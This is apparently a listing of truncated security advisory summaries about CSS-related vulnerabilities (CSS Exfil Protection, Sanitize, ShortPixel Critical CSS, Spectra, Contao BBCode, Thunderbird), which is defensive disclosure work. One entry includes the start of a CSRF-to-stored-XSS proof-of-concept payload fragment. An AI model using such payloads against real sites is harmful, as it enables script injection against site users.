PT-2024-25257 · Unknown · Css Exfil Protection

Name of the Vulnerable Software and Affected Versions: CSS Exfil Protection version 1.1.0 Description: An issue in CSS Exfil Protection allows a remote attacker to obtain sensitive information due to missing support for CSS variables. Recommendations: For CSS Exfil Protection version 1.1.0, at th...

RHEL 9 : OpenShift Container Platform 4.13.8 (RHSA-2023:4459)

The remote Redhat Enterprise Linux 9 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2023:4459 advisory. Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or privat...

RHEL 9 : OpenShift Container Platform 4.13.3 (RHSA-2023:3540)

The remote Redhat Enterprise Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2023:3540 advisory. Red Hat build of MicroShift is Red Hat's light-weight Kubernetes orchestration solution designed for edge device deployments and is built fr...

CentOS 9 : toolbox-0.0.99.4-5.el9

The remote CentOS Linux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the toolbox-0.0.99.4-5.el9 build changelog. - Angle brackets are not considered dangerous characters when inserted into CSS contexts. Templates containing multiple actions separate...

USN-6748-1: Sanitize vulnerabilities

It was discovered that Sanitize incorrectly handled noscript elements under certain circumstances. An attacker could possibly use this issue to execute a cross-site scripting XSS attack. This issue only affected Ubuntu 22.04 LTS. CVE-2023-23627 It was discovered that Sanitize incorrectly handled...

Ubuntu 20.04 LTS / 22.04 LTS / 23.10 : Sanitize vulnerabilities (USN-6748-1)

The remote Ubuntu 20.04 LTS / 22.04 LTS / 23.10 host has a package installed that is affected by multiple vulnerabilities as referenced in the USN-6748-1 advisory. It was discovered that Sanitize incorrectly handled noscript elements under certain circumstances. An attacker could possibly use thi...

WordPress ShortPixel Critical CSS plugin <= 1.0.2 - Broken Access Control vulnerability

Broken Access Control vulnerability discovered by Dhabaleshwar Das Patchstack Alliance in WordPress Plugin ShortPixel Critical CSS versions = 1.0.2...

VulnCheck KEV: CVE-2024-32810

Missing Authorization vulnerability in ShortPixel ShortPixel Critical CSS.This issue affects ShortPixel Critical CSS: from n/a through 1.0.2...

WordPress ShortPixel Critical CSS Plugin <= 1.0.2 is vulnerable to Broken Access Control

Software ShortPixel Critical CSS Type Plugin Vulnerable versions = 1.0.2 Fixed in 1.0.3 OWASP Top 10 A1: Broken Access Control Classification Broken Access Control CVE CVE-2024-32810 Patch priority High CVSS severity High 7.6 Developer ShortPixel PSID b4665651b428 Credits Dhabaleshwar Das Require...

Add Custom CSS and JS <= 1.20 - Stored XSS via CSRF

Description The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in as author and above add Stored XSS payloads via a CSRF attack Make an author or above role open the following HTML: alert"frontendjs"' /...

KLA65693 Multiple vulnerabilities in Mozilla Thunderbird

Multiple vulnerabilities were found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to execute arbitrary code, bypass security restrictions, cause denial of service, spoof user interface, obtain sensitive information, perform cross-site scripting attack. Below is a...

sanmarino.no Cross Site Scripting vulnerability OBB-3916038

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

CSS Injection

contao/comments-bundle is vulnerable to CSS Injection. The vulnerability is due to insufficient input validation and sanitization within the BBCode parsing mechanism in Comments.php, allowing attackers to inject CSS styles via comments...

CVE-2023-6486

The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS metabox in all versions up to and including 2.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

CVE-2023-6486 Spectra – WordPress Gutenberg Blocks <= 2.10.3 - Authenticated(Contributor+) Cross-Site Scripting via Custom CSS

The Spectra – WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS metabox in all versions up to and including 2.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

CVE-2023-6486

CVE-2023-6486 (Spectra – WordPress Gutenberg Blocks) Stored Cross‑Site Scripting via the Custom CSS metabox in Spectra. Affected: all versions up to 2.10.3. Root cause: insufficient input sanitization and output escaping in the metabox. Impact: authenticated attackers with contributor level or hi...

Contao: Insufficient BBCode sanitizer

Impact If BBCode is enabled for comments, users can inject CSS styles. Patches Update to Contao 4.13.40 or 5.3.4. Workarounds Disable BBCode for comments. References https://contao.org/en/security-advisories/insufficient-bbcode-sanitization For more information If you have any questions or commen...

GHSA-J55W-HJPJ-825G Contao: Insufficient BBCode sanitizer

Impact If BBCode is enabled for comments, users can inject CSS styles. Patches Update to Contao 4.13.40 or 5.3.4. Workarounds Disable BBCode for comments. References https://contao.org/en/security-advisories/insufficient-bbcode-sanitization For more information If you have any questions or commen...

CVE-2024-28234

Contao is an open source content management system. Starting in version 2.0.0 and prior to versions 4.13.40 and 5.3.4, it is possible to inject CSS styles via BBCode in comments. Installations are only affected if BBCode is enabled. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. A...

CVE-2024-28234 Contao has insufficient BBCode sanitizer

Contao is an open source content management system. Starting in version 2.0.0 and prior to versions 4.13.40 and 5.3.4, it is possible to inject CSS styles via BBCode in comments. Installations are only affected if BBCode is enabled. Contao versions 4.13.40 and 5.3.4 have a patch for this issue. A...